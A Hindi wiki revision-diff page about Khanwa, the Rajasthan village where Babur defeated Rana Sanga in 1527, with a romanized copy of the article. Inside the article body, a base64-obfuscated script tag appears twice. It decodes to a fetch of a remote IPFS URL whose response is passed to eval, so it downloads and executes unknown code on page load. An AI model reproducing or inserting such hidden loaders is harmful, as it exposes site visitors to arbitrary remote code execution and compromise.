Difference between revisions of "खानवा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पश्चात " to "पश्चात् ")
 
(2 intermediate revisions by one other user not shown)
Line 1: Line 1:
'''खानवा''' [[राजस्थान]] में [[भरतपुर]] के निकट एक ग्राम है, जो [[फतेहपुर सीकरी]] से 10 मील {{मील|मील=10}} उत्तर-पश्चिम में स्थित है। '[[भारतीय इतिहास]]' में प्रसिद्ध '[[खानवा का युद्ध]]' [[मेवाड़]] के [[राणा साँगा]] और [[बाबर]] के मध्य इसी स्थान पर [[शनिवार]], [[17 मार्च]], 1527 ई. को हुआ था।
+
'''खानवा''' [[राजस्थान]] में [[भरतपुर]] के निकट एक [[ग्राम]] है, जो [[फतेहपुर सीकरी]] से 10 मील {{मील|मील=10}} [[उत्तर (दिशा)|उत्तर]]-[[पश्चिम दिशा|पश्चिम]] में स्थित है। '[[भारतीय इतिहास]]' में प्रसिद्ध '[[खानवा का युद्ध]]' [[मेवाड़]] के [[राणा साँगा]] और [[बाबर]] के मध्य इसी स्थान पर [[शनिवार]], [[17 मार्च]], 1527 ई. को हुआ था।
  
 
*'खानवा का युद्ध' जो कोई दस घंटे चला, अविस्मरणीय युद्धों में से एक है। यद्यपि [[राजपूत]] वीरता से लड़े, किंतु विजयश्री [[बाबर]] को हासिल हुई।  
 
*'खानवा का युद्ध' जो कोई दस घंटे चला, अविस्मरणीय युद्धों में से एक है। यद्यपि [[राजपूत]] वीरता से लड़े, किंतु विजयश्री [[बाबर]] को हासिल हुई।  
 
*शायद ही कोई दूसरा ऐसा घमासान युद्ध हुआ हो, जिसका निर्णय अंतिम घड़ी तक तुला में लटका रहा।  
 
*शायद ही कोई दूसरा ऐसा घमासान युद्ध हुआ हो, जिसका निर्णय अंतिम घड़ी तक तुला में लटका रहा।  
 
*[[पानीपत युद्ध]] का कार्य [[खानवा का युद्ध|खानवा के युद्ध]] ने पूरा किया।  
 
*[[पानीपत युद्ध]] का कार्य [[खानवा का युद्ध|खानवा के युद्ध]] ने पूरा किया।  
*बाबर द्धारा [[राणा साँगा]] पर विजय प्राप्ति ने बाबर एवं उसके सैनिकों की चिंता समाप्त कर दी और वे अब [[भारत]] विजय के सपने को साकार कर सकते थे।  
+
*[[बाबर]] द्वारा [[राणा साँगा]] पर विजय प्राप्ति ने बाबर एवं उसके सैनिकों की चिंता समाप्त कर दी और वे अब [[भारत]] विजय के सपने को साकार कर सकते थे।  
*[[खानवा]] की विजय ने [[मुग़ल]] साम्राज्यवाद के बीजारोपण के मार्ग से बहुत बड़ी बाधा हटा दी थी।
+
*[[खानवा]] की विजय ने [[मुग़ल साम्राज्य|मुग़ल साम्राज्यवाद]] के बीजारोपण के मार्ग से बहुत बड़ी बाधा हटा दी थी।
 
*राजपूतों की हार का एक कारण पवार राजपूतों की सेना का ठीक युद्ध के समय महाराणा को छोड़कर बाबर से जा मिलना था।  
 
*राजपूतों की हार का एक कारण पवार राजपूतों की सेना का ठीक युद्ध के समय महाराणा को छोड़कर बाबर से जा मिलना था।  
*इस युद्ध के पश्चात् बाबर के क़दम भारत में पूरी तरह से जम गए, जिससे भावी महान [[मुग़ल साम्राज्य]] की नींव पड़ी।  
+
*इस युद्ध के पश्चात् बाबर के क़दम [[भारत]] में पूरी तरह से जम गए, जिससे भावी महान् [[मुग़ल साम्राज्य]] की नींव पड़ी।  
 
*खानवा को '[[कनवा]]' नाम से भी जाना जाता है।
 
*खानवा को '[[कनवा]]' नाम से भी जाना जाता है।
  
Line 14: Line 14:
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 130-131| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के ऐतिहासिक स्थान}}
 
{{राजस्थान के ऐतिहासिक स्थान}}
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
[[Category:राजस्थान]] [[Category:राजस्थान के ऐतिहासिक स्थान]] [[Category:इतिहास कोश]]
+
[[Category:राजस्थान]] [[Category:राजस्थान के ऐतिहासिक स्थान]] [[Category:इतिहास कोश]] [[Category:ऐतिहासिक स्थानावली]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:13, 24 May 2018

khanava rajasthan mean bharatapur ke nikat ek gram hai, jo phatehapur sikari se 10 mil (lagabhag 16 ki.mi.) uttar-pashchim mean sthit hai. 'bharatiy itihas' mean prasiddh 'khanava ka yuddh' meva d ke rana saanga aur babar ke madhy isi sthan par shanivar, 17 march, 1527 ee. ko hua tha.

  • 'khanava ka yuddh' jo koee das ghante chala, avismaraniy yuddhoan mean se ek hai. yadyapi rajapoot virata se l de, kiantu vijayashri babar ko hasil huee.
  • shayad hi koee doosara aisa ghamasan yuddh hua ho, jisaka nirnay aantim gh di tak tula mean lataka raha.
  • panipat yuddh ka kary khanava ke yuddh ne poora kiya.
  • babar dvara rana saanga par vijay prapti ne babar evan usake sainikoan ki chianta samapt kar di aur ve ab bharat vijay ke sapane ko sakar kar sakate the.
  • khanava ki vijay ne mugal samrajyavad ke bijaropan ke marg se bahut b di badha hata di thi.
  • rajapootoan ki har ka ek karan pavar rajapootoan ki sena ka thik yuddh ke samay maharana ko chho dakar babar se ja milana tha.
  • is yuddh ke pashchath babar ke qadam bharat mean poori tarah se jam ge, jisase bhavi mahanh mugal samrajy ki nianv p di.
  • khanava ko 'kanava' nam se bhi jana jata hai.
  1. REDIRECTsaancha:inhean bhi dekhean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 130-131| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>